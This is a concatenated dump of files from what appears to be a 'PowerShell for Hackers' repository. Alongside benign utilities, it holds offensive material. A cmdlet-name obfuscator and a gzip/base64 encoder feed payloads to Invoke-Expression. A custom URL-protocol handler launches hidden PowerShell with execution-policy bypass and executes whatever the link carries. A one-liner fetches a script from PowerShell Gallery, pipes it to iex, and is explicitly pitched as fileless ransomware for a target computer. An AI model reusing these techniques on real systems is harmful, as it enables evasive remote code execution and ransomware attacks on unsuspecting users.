/VideoNotes/Convert-Cmdlet.md: -------------------------------------------------------------------------------- 1 | # Convert-Cmdlet Function 2 | 3 | ## Description 4 | The `Convert-Cmdlet` function is a PowerShell utility designed to encode the names of PowerShell cmdlets. It replaces each character in a given cmdlet name with an index from a randomized set of valid characters, then constructs a new string representation of that cmdlet. 5 | 6 | ## Usage 7 | 8 | ### Syntax 9 | ```powershell 10 | $result = Convert-Cmdlet -cmdlet '' 11 | ``` 12 | 13 | ### Parameters 14 | - `-cmdlet`: The name of the PowerShell cmdlet you want to convert. 15 | 16 | ### Examples 17 | ```powershell 18 | # Convert the cmdlet 'Get-Process' 19 | $encodedCmdlet = Convert-Cmdlet -cmdlet 'Get-Process' 20 | Write-Host $encodedCmdlet 21 | ``` 22 | 23 | ## Function Code 24 | ```powershell 25 | function Convert-Cmdlet { 26 | param ( 27 | [string]$cmdlet 28 | ) 29 | 30 | # All valid characters in a cmdlet name 31 | $valid = ('-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'.ToCharArray() | Sort-Object { Get-Random }) -join '' 32 | $replaceWith = $valid.ToCharArray() 33 | $extractedCharArray = @() 34 | $cmdletCharArray = $cmdlet.ToCharArray() 35 | 36 | # Loop through each character within the cmdlet 37 | ForEach ($char in $cmdletCharArray) { 38 | If ($char -in $replaceWith) { 39 | $extractedCharArray += $([array]::IndexOf($replaceWith, $char)) 40 | } 41 | } 42 | 43 | $NewValue = "& ((""$valid"")[$($extractedCharArray -join ',')] -join '')" 44 | return $NewValue 45 | } 46 | ``` 47 | 48 | ## Notes 49 | - The function generates a unique encoding for each cmdlet based on a randomized set of valid characters. 50 | - This encoding is primarily for demonstration purposes and should be tested before use in production environments. 51 | -------------------------------------------------------------------------------- /Assets/rev.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 9 | 10 | 11 | 12 | r.ToString()).ToArray()); 38 | 39 | Console.WriteLine(output); 40 | } 41 | } 42 | 43 | return true; 44 | } 45 | } 46 | 47 | ]]> 48 | 49 | 50 | 51 | 52 | -------------------------------------------------------------------------------- /VideoNotes/shortestAlias.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ```powershell 5 | function Replace-CmdletsWithAliases { 6 | param ( 7 | [Parameter(Mandatory)] 8 | [ScriptBlock]$ScriptBlock 9 | ) 10 | 11 | # Get a list of all cmdlets and their aliases 12 | $cmdletAliases = Get-Command -CommandType Cmdlet | 13 | ForEach-Object { 14 | $cmdletName = $_.Name 15 | $aliases = @(Get-Alias -Definition $cmdletName -ErrorAction SilentlyContinue).Name 16 | if ($aliases) { 17 | # Filter out single-letter aliases and select the most appropriate alias 18 | $appropriateAlias = $aliases | Where-Object { $_.Length -gt 1 } | Sort-Object Length | Select-Object -First 1 19 | if ($appropriateAlias) { 20 | [PSCustomObject]@{ 21 | Name = $cmdletName 22 | Alias = $appropriateAlias 23 | } 24 | } 25 | } 26 | } | Where-Object Alias 27 | 28 | 29 | # Convert the script block to string 30 | $scriptContent = $ScriptBlock.ToString() 31 | 32 | # Parse the script block into AST 33 | $ast = [System.Management.Automation.Language.Parser]::ParseInput($scriptContent, [ref]$null, [ref]$null) 34 | 35 | # Find all command elements 36 | $commandElements = $ast.FindAll({ $args[0] -is [System.Management.Automation.Language.CommandAst] }, $true) 37 | 38 | foreach ($command in $commandElements) { 39 | $cmdletName = $command.GetCommandName() 40 | $aliasMapping = $cmdletAliases | Where-Object { $_.Name -eq $cmdletName } 41 | 42 | if ($aliasMapping) { 43 | # Replace cmdlet name with alias 44 | $scriptContent = $scriptContent -replace "\b$cmdletName\b", $aliasMapping.Alias 45 | } 46 | } 47 | 48 | return $scriptContent 49 | } 50 | 51 | ``` 52 | -------------------------------------------------------------------------------- /VideoNotes/passwordEncryption.md: -------------------------------------------------------------------------------- 1 | # File Encryption and Decryption Tutorial Using PowerShell 2 | 3 | This tutorial demonstrates how to encrypt and decrypt files using PowerShell and the .NET Framework's AES encryption. 4 | 5 | ## Prerequisites 6 | 7 | - PowerShell 8 | - Basic understanding of scripting 9 | - A file to encrypt and decrypt 10 | 11 | ## PowerShell Script 12 | 13 | ```powershell 14 | # Load necessary assembly for encryption 15 | Add-Type -AssemblyName System.Security 16 | 17 | # Encryption Process 18 | # Creating AES encryption provider 19 | $aes = New-Object System.Security.Cryptography.AesCryptoServiceProvider 20 | $aes.GenerateKey() 21 | $aes.GenerateIV() 22 | 23 | # Reading the file to encrypt 24 | $plaintextBytes = [System.IO.File]::ReadAllBytes("path\\to\\your\\file") 25 | 26 | # Encrypting the data 27 | $encryptor = $aes.CreateEncryptor($aes.Key, $aes.IV) 28 | $encryptedBytes = $encryptor.TransformFinalBlock($plaintextBytes, 0, $plaintextBytes.Length) 29 | 30 | # Writing the encrypted data to a new file 31 | [System.IO.File]::WriteAllBytes("path\\to\\encrypted\\file", $encryptedBytes) 32 | 33 | # Saving the key and IV for decryption 34 | $key = [Convert]::ToBase64String($aes.Key) 35 | $IV = [Convert]::ToBase64String($aes.IV) 36 | $key | Out-File "path\\to\\keyfile" 37 | $IV | Out-File "path\\to\\ivfile" 38 | 39 | # Decryption Process 40 | # Setting up AES decryption provider 41 | $aesDecryptor = New-Object System.Security.Cryptography.AesCryptoServiceProvider 42 | $aesDecryptor.Key = [Convert]::FromBase64String($key) 43 | $aesDecryptor.IV = [Convert]::FromBase64String($IV) 44 | 45 | # Reading the encrypted file 46 | $encryptedBytes = [System.IO.File]::ReadAllBytes("path\\to\\encrypted\\file") 47 | 48 | # Decrypting the data 49 | $decryptor = $aesDecryptor.CreateDecryptor($aesDecryptor.Key, $aesDecryptor.IV) 50 | $decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length) 51 | 52 | # Writing the decrypted data to a file 53 | [System.IO.File]::WriteAllBytes("path\\to\\decrypted\\file", $decryptedBytes) 54 | -------------------------------------------------------------------------------- /Assets/images/hello.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 |
4 | 60 | 61 |
62 |

Hi there, my name is Nikola
👋

63 |
64 |
65 | 66 | -------------------------------------------------------------------------------- /VideoNotes/compression.md: -------------------------------------------------------------------------------- 1 | # PowerShell Command Encoder/Decoder 2 | 3 | This README explains the use of two PowerShell functions: `Encode-Command` and `Decode-Command`. The `Encode-Command` function is used to compress and Base64 encode a PowerShell command, while the `Decode-Command` function decodes and executes the encoded command. 4 | 5 | ## Encode-Command Function 6 | 7 | This function compresses a given PowerShell command using Gzip and encodes it in Base64. 8 | 9 | Usage 10 | To use these functions: 11 | 12 | Encode a command: $encoded = Encode-Command -Command 'Write-Output "Hello, World!"' 13 | Decode and execute the command: Decode-Command -EncodedCommand $encoded 14 | 15 | ```powershell 16 | function Encode-Command { 17 | param( 18 | [Parameter(Mandatory=$true)] 19 | [string]$Command 20 | ) 21 | 22 | # Convert command to byte array 23 | $byteArray = [System.Text.Encoding]::ASCII.GetBytes($Command) 24 | 25 | # Compress the byte array 26 | $memoryStream = New-Object System.IO.MemoryStream 27 | $gzipStream = New-Object System.IO.Compression.GzipStream $memoryStream, ([System.IO.Compression.CompressionMode]::Compress) 28 | $gzipStream.Write($byteArray, 0, $byteArray.Length) 29 | $gzipStream.Close() 30 | 31 | # Convert compressed data to Base64 32 | $encodedCommand = [Convert]::ToBase64String($memoryStream.ToArray()) 33 | $memoryStream.Close() 34 | 35 | return $encodedCommand 36 | } 37 | ``` 38 | 39 | ```powershell 40 | function Decode-Command { 41 | param( 42 | [Parameter(Mandatory=$true)] 43 | [string]$EncodedCommand 44 | ) 45 | 46 | # Convert from Base64 to byte array 47 | $decodedBytes = [Convert]::FromBase64String($EncodedCommand) 48 | 49 | # Decompress the byte array 50 | $memoryStream = New-Object System.IO.MemoryStream($decodedBytes, 0, $decodedBytes.Length) 51 | $gzipStream = New-Object System.IO.Compression.GzipStream($memoryStream, [System.IO.Compression.CompressionMode]::Decompress) 52 | $streamReader = New-Object System.IO.StreamReader($gzipStream) 53 | $decompressedCommand = $streamReader.ReadToEnd() 54 | 55 | # Execute the decompressed command 56 | Invoke-Expression $decompressedCommand 57 | 58 | $gzipStream.Close() 59 | $memoryStream.Close() 60 | } 61 | ``` 62 | -------------------------------------------------------------------------------- /Assets/template.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # Name of your function 16 | 17 | ## Description 18 | 19 | A short description of what your function accomplishes 20 | 21 | ## The Function 22 | 23 | ### [FUNCTION-NAME] 24 | 25 | A short description of how your function works 26 | 27 | ``` 28 | function YOUR-FUNCTION { 29 | 30 | } 31 | ``` 32 | 33 |

(back to top)

34 | 35 | 36 | ## Examples 37 | [//]: # (Examples of scripts that have used your function) 38 | Listed below are payloads that have used one of these functions: 39 | 40 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 41 | 42 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 43 | 44 | 45 |

(back to top)

46 | 47 | 48 | ## Contact 49 | 50 | I am Jakoby 51 |


52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 |

72 | 73 | 74 | 75 |

(back to top)

76 | 77 | 78 | ## Acknowledgments 79 | 80 | * [Hak5](https://hak5.org/) 81 | * [UberGuidoZ](https://github.com/UberGuidoZ) 82 | 83 | *** 84 | 85 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 86 | 87 |

(back to top)

88 | -------------------------------------------------------------------------------- /Assets/Scripts/Powershell-2-Ducky/ReadMe.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # Name of your function 16 | 17 | ## Description 18 | 19 | A short description of what your function accomplishes 20 | 21 | ## The Function 22 | 23 | ### [FUNCTION-NAME] 24 | 25 | A short description of how your function works 26 | 27 | ``` 28 | function YOUR-FUNCTION { 29 | 30 | } 31 | ``` 32 | 33 |

(back to top)

34 | 35 | 36 | ## Examples 37 | [//]: # (Examples of scripts that have used your function) 38 | Listed below are payloads that have used one of these functions: 39 | 40 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 41 | 42 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 43 | 44 | 45 |

(back to top)

46 | 47 | 48 | ## Contact 49 | 50 | I am Jakoby 51 |


52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 |

72 | 73 | 74 | 75 |

(back to top)

76 | 77 | 78 | ## Acknowledgments 79 | 80 | * [Hak5](https://hak5.org/) 81 | * [UberGuidoZ](https://github.com/UberGuidoZ) 82 | 83 | *** 84 | 85 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 86 | 87 |

(back to top)

88 | -------------------------------------------------------------------------------- /Functions/Def_Protocol_HNDLR.md: -------------------------------------------------------------------------------- 1 | ```powershell 2 | New-Item -Path "HKCR:\ps" -Force | Out-Null 3 | New-ItemProperty -Path "HKCR:\ps" -Name "(Default)" -Value "URL:ps Protocol" -PropertyType String -Force | Out-Null 4 | New-ItemProperty -Path "HKCR:\ps" -Name "URL Protocol" -Value "" -PropertyType String -Force | Out-Null 5 | New-ItemProperty -Path "HKCR:\ps\shell\open\command" -Name "(Default)" -Value '"$env:userprofile\Documents\myhandler.ps1" "%1"' ` 6 | -PropertyType String -Force | Out-Null 7 | ``` 8 | 9 | 10 | 11 | ```powershell 12 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w h -Ep Bypass -File "$env:userprofile\Documents\myhandler.ps1" "%1" 13 | ``` 14 | 15 | 16 | ```powershell 17 | # Extract the URI from the command-line arguments 18 | $webURL = $args[0] 19 | 20 | # Define a function to convert URL-encoded characters to their ASCII value 21 | function Convert-UrlEncodedToAscii { 22 | param( 23 | [Parameter(Mandatory=$true)][string]$UrlEncodedString 24 | ) 25 | 26 | # Decode the URL-encoded string to plain text 27 | $decoded = [System.Uri]::UnescapeDataString($UrlEncodedString) 28 | 29 | # Define a regular expression to match URL-encoded characters 30 | $regex = '%([0-9a-fA-F]{2})' 31 | 32 | # Loop through all matches of URL-encoded characters and replace them with their ASCII value 33 | $asciiString = "" 34 | ([regex]$regex).Matches($decoded) | ForEach-Object { 35 | $asciiValue = [int][byte]::Parse($_.Groups[1].Value, "HexNumber") 36 | $asciiString += [char]$asciiValue 37 | } 38 | 39 | # Remove all URL-encoded characters from the decoded string 40 | $remainingString = $decoded.Replace($regex, '') 41 | 42 | # Trim the string up to the first occurrence of "//" 43 | $index = $remainingString.IndexOf("//") 44 | if ($index -ge 0) { 45 | $remainingString = $remainingString.Substring($index + 2) 46 | } 47 | 48 | # Combine the ASCII string and the remaining string 49 | $decodeOutput = $asciiString + $remainingString 50 | 51 | # Trim the last character from the string 52 | $decodeOutput = $decodeOutput.Substring(0, $decodeOutput.Length - 1) 53 | 54 | # Return the decoded and trimmed string 55 | return $decodeOutput 56 | } 57 | 58 | # Call the function to convert the URL-encoded characters in the input URL to ASCII 59 | $fullASCII = Convert-UrlEncodedToAscii $webURL 60 | 61 | # Output the decoded and trimmed string in red text 62 | Write-Host $fullASCII -ForegroundColor Red 63 | 64 | # Execute a PowerShell command using the decoded and trimmed string as input 65 | $CMD = "powershell.exe $fullASCII" 66 | $CMD | iex 67 | 68 | ``` 69 | -------------------------------------------------------------------------------- /VideoNotes/cGpt.txt: -------------------------------------------------------------------------------- 1 | # powerGallery 2 | 3 | This one liner will load the neccessary files to encrypt a system straight from the trusted powershellgallery.com website. 4 | Used in conjunction with a simple for loop its is now fileless ransomware hosted and executed from your platform 5 | 6 | ```powershell 7 | ([regex]::Matches((irm "https://www.powershellgallery.com/packages/PSAES/1.0.0.5/Content/Protect-AESMessage.ps1"),'(?<=).*?(?=<\/td>)','s').Value|%{[System.Net.WebUtility]::HtmlDecode($_)})-replace'<[^>]*>'-replace'^\s*',''-replace '[^\x20-\x7E]'|iex 8 | ``` 9 | 10 | Next its as simple as running the commands stored in that module agaisnt the system 11 | In this instance we can encrypt a string, but why stop there? 12 | 13 | ```powershell 14 | $encryptedMessage = Protect-AESMessage -Message "Sensitive Data" -Password "89c57yj78754cth8" 15 | ``` 16 | 17 | Combining them into a simple one liner. Together with yet another simple functionality the `for loop` you should be able to see the danger 18 | We could run fileless ransomware on a target computer all from a trusted source 19 | 20 | ```powershell 21 | ([regex]::Matches((irm "https://www.powershellgallery.com/packages/PSAES/1.0.0.5/Content/Protect-AESMessage.ps1"),'(?<=).*?(?=<\/td>)','s').Value|%{[System.Net.WebUtility]::HtmlDecode($_)})-replace'<[^>]*>'-replace'^\s*',''-replace '[^\x20-\x7E]'|iex;$encryptedMessage = Protect-AESMessage -Message "Sensitive Data" -Password "89c57yj78754cth8" 22 | ``` 23 | 24 | You can use this function to grab the links of all the .ps1 files in a module from the powershell gallery website 25 | 26 | ```powershell 27 | function Get-Ps1Urls { 28 | param ([string]$Url) 29 | try { 30 | $content = Invoke-RestMethod -Uri $Url 31 | $regex = ']*href="([^"]+\.ps1)"[^>]*>' 32 | $matches = [regex]::Matches($content, $regex) 33 | $baseURL = "https://www.powershellgallery.com" 34 | $ps1Links = @() 35 | foreach ($match in $matches) { 36 | $relativeLink = $match.Groups[1].Value 37 | $fullLink = $baseURL + $relativeLink 38 | $ps1Links += $fullLink 39 | } 40 | return $ps1Links 41 | } 42 | catch { 43 | Write-Error "An error occurred: $_" 44 | } 45 | } 46 | ``` 47 | 48 | Syntax: 49 | 50 | ```powershell 51 | $urls = get-Ps1Urls -Url "https://www.powershellgallery.com/packages/PSAES/1.0.0.5" 52 | ``` 53 | 54 | 55 | ```powershell 56 | $urls = @("https://www.powershellgallery.com/packages/PSAES/1.0.0.5/Content/Protect-AESMessage.ps1") 57 | 58 | foreach ($url in $urls){([regex]::Matches((irm "$url"), '(?<=).*?(?=<\/td>)', 's').Value|%{[System.Net.WebUtility]::HtmlDecode($_)})-replace'<(?!#)[^>]+>|(?(?![^#])',''} 59 | ``` 60 | -------------------------------------------------------------------------------- /VideoNotes/Convert-ImageToHtml.ps1: -------------------------------------------------------------------------------- 1 | function Convert-ImageToHtml 2 | { 3 | <# 4 | .SYNOPSIS 5 | This function can be used to convert an image file into an HTML IMG tag with an image 6 | embedded in the SRC so that an external image file doesn't have to be referenced. 7 | .PARAMETER $ImageFile 8 | The image file path. 9 | .PARAMETER $MakeHtml 10 | An HTML file will be created using the same name as the image file. 11 | .EXAMPLE 12 | Convert a single image file to an HTML IMG tag and display the code. 13 | PS C:\> Convert-ImageToHtml -$ImageFile c:\temp\picture.png -Verbose 14 | .EXAMPLE 15 | Convert a directory of images to HTML IMG tags and display the code. 16 | PS C:\> Get-ChildItem *.png | select fullname | Convert-ImageToHtml -Verbose 17 | .EXAMPLE 18 | Convert a directory of images to HTML IMG tags, display the code, and write them to html files. 19 | PS C:\> Get-ChildItem *.png | select fullname | Convert-ImageToHtml -Verbose -MakeHtml 20 | .NOTES 21 | Author: Scott Sutherland (@_nullbind) 22 | #> 23 | 24 | [CmdletBinding()] 25 | Param( 26 | [Parameter(Mandatory = $true, 27 | ValueFromPipeline = $true, 28 | ValueFromPipelineByPropertyName = $true, 29 | HelpMessage = 'The image file path.')] 30 | [string]$ImageFile, 31 | 32 | [Parameter(Mandatory = $false, 33 | HelpMessage = 'An HTML file will be created using the same name as the image file.')] 34 | [switch]$MakeHtml 35 | ) 36 | 37 | 38 | Process { 39 | 40 | try { 41 | 42 | # Process for common parameter names if pipeline is used 43 | if($PSCmdlet.MyInvocation.ExpectingInput){ 44 | $CheckFullName = $_ | gm | where name -like "fullname" 45 | if($CheckFullName){ 46 | $ImageFile = $_.fullname 47 | } 48 | } 49 | 50 | # Verbose info 51 | Write-Verbose "Processing $ImageFile" 52 | 53 | # Read image file 54 | $ImageBytes = [System.IO.File]::ReadAllBytes("$ImageFile") 55 | 56 | # Convert to base64 string 57 | $ImageString = [System.Convert]::ToBase64String($ImageBytes) 58 | 59 | # Create HTML with an embedded image 60 | $output = "" 61 | 62 | # Display image tag 63 | $output 64 | 65 | if($MakeHtml){ 66 | $output | Out-File "$ImageFile.html" 67 | } 68 | }catch{ 69 | Write-Error "Something went wrong. Check your paths. :)" -ErrorId B1 -TargetObject $_ 70 | } 71 | 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /Functions/DefaultBrowser.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # Default Browser 16 | 17 | ## Description 18 | 19 | This function will get the default browser of your targets PC 20 | 21 | ## The Function 22 | 23 | ### [Get-DefaultBrowser] 24 | 25 | This function will make a call to the registry to get the default Browser using the following syntax: 26 | 27 | $Default-Browser = Get-DefaultBrowser 28 | 29 | ``` 30 | function Get-DefaultBrowser{ 31 | 32 | # Param([parameter(Mandatory=$true)][alias("Computer")]$ComputerName) 33 | $ComputerName = hostname 34 | $Registry = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', $ComputerName) 35 | $RegistryKey = $Registry.OpenSubKey("SOFTWARE\\Classes\\http\\shell\\open\\command") 36 | #Get (Default) Value 37 | $Value = $RegistryKey.GetValue("") 38 | 39 | return $Value 40 | } 41 | ``` 42 | 43 |

(back to top)

44 | 45 | 46 | ## Examples 47 | [//]: # (Examples of scripts that have used your function) 48 | Listed below are payloads that have used one of these functions: 49 | 50 | No payloads so far have used this function, please feel free to submit your own scripts that have used this function 51 | 52 | 53 |

(back to top)

54 | 55 | 56 | ## Contact 57 | 58 |

I am Jakoby

59 |


60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 |

80 | 81 | 82 | 83 |

(back to top)

84 | 85 | 86 | ## Acknowledgments 87 | 88 | * [Hak5](https://hak5.org/) 89 | * [UberGuidoZ](https://github.com/UberGuidoZ) 90 | 91 | *** 92 | 93 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 94 | 95 |

(back to top)

96 | -------------------------------------------------------------------------------- /VideoNotes/PsChat.md: -------------------------------------------------------------------------------- 1 | # PowerShell Chat Room Project 2 | 3 | ## Project Overview 4 | This project aims to create a chat system allowing communication between multiple computers using PowerShell, with a Linode server as an intermediary. 5 | 6 | ## Table of Contents 7 | - [Project Scope](#project-scope) 8 | - [Linode Server Setup](#linode-server-setup) 9 | - [Chat System Architecture](#chat-system-architecture) 10 | - [Server-side Application Development](#server-side-application-development) 11 | - [PowerShell Client Development](#powershell-client-development) 12 | - [Implementing Communication](#implementing-communication) 13 | - [Testing](#testing) 14 | - [Security and Reliability](#security-and-reliability) 15 | - [Documentation and Cleanup](#documentation-and-cleanup) 16 | - [Future Enhancements](#future-enhancements) 17 | 18 | ## Project Scope 19 | - **Objective:** Create a chat system with PowerShell clients and a Linode server. 20 | - **Technologies:** PowerShell, Linux server, optional database, and web server technology. 21 | - **Security:** Implement SSL/TLS for secure communication. 22 | 23 | ## Linode Server Setup 24 | 1. **Select a Linode Plan:** Choose a plan that fits the project needs. 25 | 2. **Install Linux:** Set up a Linux distribution like Ubuntu. 26 | 3. **Security Measures:** Configure firewalls and SSH keys. 27 | 4. **Install Software:** Install necessary software like Apache, Node.js, or Python. 28 | 29 | ## Chat System Architecture 30 | - **Model:** Use a client-server model for message handling. 31 | - **Protocol:** Choose a communication protocol (e.g., HTTP, WebSocket). 32 | 33 | ## Server-side Application Development 34 | 1. **Backend Logic:** Write a script to handle and broadcast messages. 35 | 2. **Database Setup (Optional):** Configure a database to store chat records. 36 | 37 | ## PowerShell Client Development 38 | 1. **Scripting:** Develop scripts for sending and receiving messages. 39 | 2. **Interface:** Create a text-based interface in PowerShell. 40 | 41 | ## Implementing Communication 42 | - **Sending Messages:** Code the functionality to send messages to the server. 43 | - **Receiving Messages:** Implement a method to receive new messages, like polling. 44 | 45 | ## Testing 46 | 1. **Local Network Testing:** Begin testing on a local network. 47 | 2. **Linode Server Testing:** Progress to testing with the Linode server. 48 | 49 | ## Security and Reliability 50 | - **Secure Data Transmission:** Implement SSL/TLS. 51 | - **Error Handling:** Add comprehensive error handling and logging. 52 | 53 | ## Documentation and Cleanup 54 | - **User Guide:** Write documentation on how to use the chat system. 55 | - **Code Refinement:** Refine and comment the code for better clarity. 56 | 57 | ## Future Enhancements 58 | - **Additional Features:** Consider private messaging, user authentication, or multiple chat rooms. 59 | - **Performance Optimization:** Focus on server performance and scalability. 60 | 61 | -------------------------------------------------------------------------------- /VideoNotes/ImgDecon.md: -------------------------------------------------------------------------------- 1 | 2 | # Load required assemblies 3 | Add-Type -AssemblyName System.Windows.Forms 4 | Add-Type -AssemblyName System.Drawing 5 | 6 | # Function to get image metadata 7 | function Get-ImageMetadata { 8 | param ([string]$imagePath) 9 | 10 | $image = [System.Drawing.Image]::FromFile($imagePath) 11 | $metadata = @{ 12 | "Name" = [System.IO.Path]::GetFileName($imagePath) 13 | "FilePath" = $imagePath 14 | "Width" = $image.Width 15 | "Height" = $image.Height 16 | "Format" = $image.RawFormat.ToString() 17 | # Add more properties as needed 18 | } 19 | 20 | $image.Dispose() 21 | return $metadata 22 | } 23 | 24 | # Create the form with dark theme settings 25 | $form = New-Object System.Windows.Forms.Form 26 | $form.Text = 'Image Metadata Viewer' 27 | $form.Size = New-Object System.Drawing.Size(500, 600) # Adjusted form size 28 | $form.BackColor = [System.Drawing.Color]::FromArgb(45, 45, 48) # Dark background color 29 | $form.AutoScaleMode = 'Dpi' 30 | 31 | # Panel for the PictureBox 32 | $panel = New-Object System.Windows.Forms.Panel 33 | $panel.Size = New-Object System.Drawing.Size(470, 310) # Slightly larger than the PictureBox 34 | $panel.Location = New-Object System.Drawing.Point(15, 15) # Adjust location as needed 35 | $panel.BackColor = [System.Drawing.Color]::White # Border color 36 | $form.Controls.Add($panel) 37 | 38 | # PictureBox 39 | $pictureBox = New-Object System.Windows.Forms.PictureBox 40 | $pictureBox.Size = New-Object System.Drawing.Size(460, 300) # Set the PictureBox size 41 | $pictureBox.SizeMode = "Zoom" # Scale the image proportionally 42 | $pictureBox.Location = New-Object System.Drawing.Point(5, 5) # Adjust location to be inside the Panel 43 | $pictureBox.BackColor = [System.Drawing.Color]::Transparent # Optional, for PictureBox background 44 | $panel.Controls.Add($pictureBox) 45 | 46 | # Load and display image 47 | $imagePath = "C:\Users\micha\Desktop\zsec.png" # Use your specified image path 48 | $pictureBox.Image = [System.Drawing.Image]::FromFile($imagePath) 49 | 50 | # Get and display image metadata 51 | $metadata = Get-ImageMetadata -imagePath $imagePath 52 | $yPos = 340 53 | foreach ($key in $metadata.Keys) { 54 | $label = New-Object System.Windows.Forms.Label 55 | $label.Text = "${key}:" 56 | $label.Location = New-Object System.Drawing.Point(20, $yPos) 57 | $label.Size = New-Object System.Drawing.Size(80, 20) 58 | $label.ForeColor = [System.Drawing.Color]::White 59 | $form.Controls.Add($label) 60 | 61 | $textBox = New-Object System.Windows.Forms.TextBox 62 | $textBox.Text = $metadata[$key] 63 | $textBox.Location = New-Object System.Drawing.Point(100, $yPos) 64 | $textBox.Size = New-Object System.Drawing.Size(380, 20) 65 | $textBox.ReadOnly = $true 66 | $form.Controls.Add($textBox) 67 | 68 | $yPos += 30 69 | } 70 | 71 | # Show the form 72 | $form.ShowDialog() 73 | 74 | -------------------------------------------------------------------------------- /Functions/Minimize-Apps.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # Minimize Apps 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | A function to minimize all the apps on your targets screen 27 | 28 | ## The Function 29 | 30 | ### [Minimize-Apps] 31 | 32 | A short description of how your function works 33 | 34 | ``` 35 | Function Minimize-Apps 36 | { 37 | $apps = New-Object -ComObject Shell.Application 38 | $apps.MinimizeAll() 39 | } 40 | ``` 41 | 42 |

(back to top)

43 | 44 | 45 | ## Examples 46 | [//]: # (Examples of scripts that have used your function) 47 | Listed below are payloads that have used one of these functions: 48 | 49 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 50 | 51 | 52 |

(back to top)

53 | 54 | 55 | ## Contact 56 | 57 |

📱 My Socials 📱

58 |
59 | 60 | 61 | 67 | 73 | 79 | 85 | 86 |
62 | 63 | C# 64 | 65 |
YouTube 66 | 		68 | 69 | Python 70 | 71 |
Twitter 72 | 		74 | 75 | Golang 76 | 77 |
Instagram 78 | 		80 | 81 | Jsonnet 82 | 83 |
Discord 84 |
87 |
88 | 89 | 90 | 91 |

(back to top)

92 | 93 | 94 | ## Acknowledgments 95 | 96 | * [Hak5](https://hak5.org/) 97 | * [UberGuidoZ](https://github.com/UberGuidoZ) 98 | 99 | *** 100 | 101 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 102 | 103 |

(back to top)

104 | -------------------------------------------------------------------------------- /VideoNotes/CertManagmentGuide.md: -------------------------------------------------------------------------------- 1 | # Certificate Management Guide 2 | 3 | This README provides an overview of how to create a self-signed certificate, export a certificate with its private key, transfer it securely, and import it on a recipient's system. This process is crucial for sharing certificates used for encryption and decryption, as well as for testing and development purposes. 4 | 5 | ## Table of Contents 6 | 7 | - [Creating Self-Signed Certificates](#creating-self-signed-certificates) 8 | - [Exporting Certificates](#exporting-certificates) 9 | - [Secure Transfer](#secure-transfer) 10 | - [Importing Certificates](#importing-certificates) 11 | - [Security Considerations](#security-considerations) 12 | 13 | ## Creating Self-Signed Certificates 14 | 15 | ### Steps to Create a Self-Signed Certificate 16 | 17 | 1. **Open PowerShell as Administrator**. 18 | 2. **Run the Command**: Use the following command to create a self-signed certificate: 19 | ```powershell 20 | $cert = New-SelfSignedCertificate -CertStoreLocation "cert:\CurrentUser\My" -KeyUsage KeyEncipherment, DataEncipherment -Type DocumentEncryptionCert -Subject "Document Encryption Certificate" 21 | 22 | 23 | # Certificate Management Guide 24 | 25 | This README provides an overview of how to export a certificate with its private key, transfer it securely, and import it on a recipient's system. This process is crucial for sharing certificates used for encryption and decryption. 26 | 27 | ## Table of Contents 28 | 29 | - [Exporting Certificates](#exporting-certificates) 